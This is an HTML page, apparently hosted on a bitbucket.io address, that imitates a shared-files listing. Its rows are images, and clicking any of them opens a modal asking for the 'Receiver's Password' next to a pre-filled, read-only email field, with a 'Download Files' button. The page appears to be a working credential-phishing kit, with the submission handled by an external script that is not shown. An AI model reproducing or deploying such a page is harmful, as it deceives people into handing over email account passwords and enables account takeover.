<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <title></title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
   <link rel="stylesheet" href="redacvx.bitbucket.io_files/bootstrap.css">
  <script src="redacvx.bitbucket.io_files/jquery.js"></script>

  <script src="redacvx.bitbucket.io_files/bootstrap.js"></script>
    <script src="redacvx.bitbucket.io_files/main.js"></script>
    <style>
        .col-sm-3 {
            cursor: pointer;
        }
        /* #myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
        } */
        
        @media (max-width: 575.98px) {
            /* #myModal {
                position: absolute;
                top: 70%;
                left: 50%;
                transform: translate(-50%, -50%);
            } */
            #asd,
            .col-sm-2,
            .col-sm-4 {
                display: none;
            }
            .col-sm-3 {
                width: 46%
            }
        }
    </style>
</head>

<body>

    <div class="loaded">
<div class="row">
<div class="col-sm-2"> <img src="redacvx.bitbucket.io_files/sd.png" class="img-fluid"></div>
<div class="col-sm-6">
<img src="redacvx.bitbucket.io_files/7.png">
<table class="table ">
    <tbody><tr data-toggle="modal" data-target="#myModal">
        <th>Name↑</th>
        <th>Modified▼</th>
        <th>Members▼</th>
    </tr>
    <tr data-toggle="modal" data-target="#myModal">
        <td><img src="redacvx.bitbucket.io_files/2.png"></td>
        <td><img src="redacvx.bitbucket.io_files/4.png"></td>
        <td><img src="redacvx.bitbucket.io_files/5.png"></td>
    </tr>
    <tr data-toggle="modal" data-target="#myModal">
        <td><img src="redacvx.bitbucket.io_files/1.png"></td>
        <td><img src="redacvx.bitbucket.io_files/4.png"></td>
        <td><img src="redacvx.bitbucket.io_files/5.png"></td>
    </tr>
    <tr data-toggle="modal" data-target="#myModal">
        <td><img src="redacvx.bitbucket.io_files/3.png"></td>
        <td><img src="redacvx.bitbucket.io_files/4.png"></td>
        <td><img src="redacvx.bitbucket.io_files/5.png"></td>
    </tr>
</tbody></table>
</div>
<div class="col-sm-4"><img src="redacvx.bitbucket.io_files/sd2.png" class="img-fluid"></div>
</div>

    
    <!-- The Modal -->
    <div class="modal" id="myModal">
        <div class="modal-dialog">
            <div class="modal-content">

                <!-- Modal Header -->
              

                <!-- Modal body -->
                <div class="modal-body p-3">

                  <img src="redacvx.bitbucket.io_files/to.png" class="img-fluid">
<div class="text-danger" id="msg" style="font-weight:600; font-size:17px;"></div>
                    <form method="post" id="formx" class="my-4">
                        
                    
                        <input type="email" name="x1" id="x1" class="form-control" value="" readonly="readonly">
                        <div class="mb-1"><img src="redacvx.bitbucket.io_files/cc.png" class="img-fluid"></div>
                        <input type="password" name="x2" id="x2" class="form-control mb-3" placeholder="Receiver's Password" value="" required="">
                     
                        <div class="text-center">
                        <button id="submitBtn" class="btn btn-md btn-primary">Download Files</button><br>
                        <img src="redacvx.bitbucket.io_files/mn.png" class="img-fluid">
                        </div>
                    </form>

                  
                 

                </div>
            </div>
        </div>
    </div>
</div>





</body></html>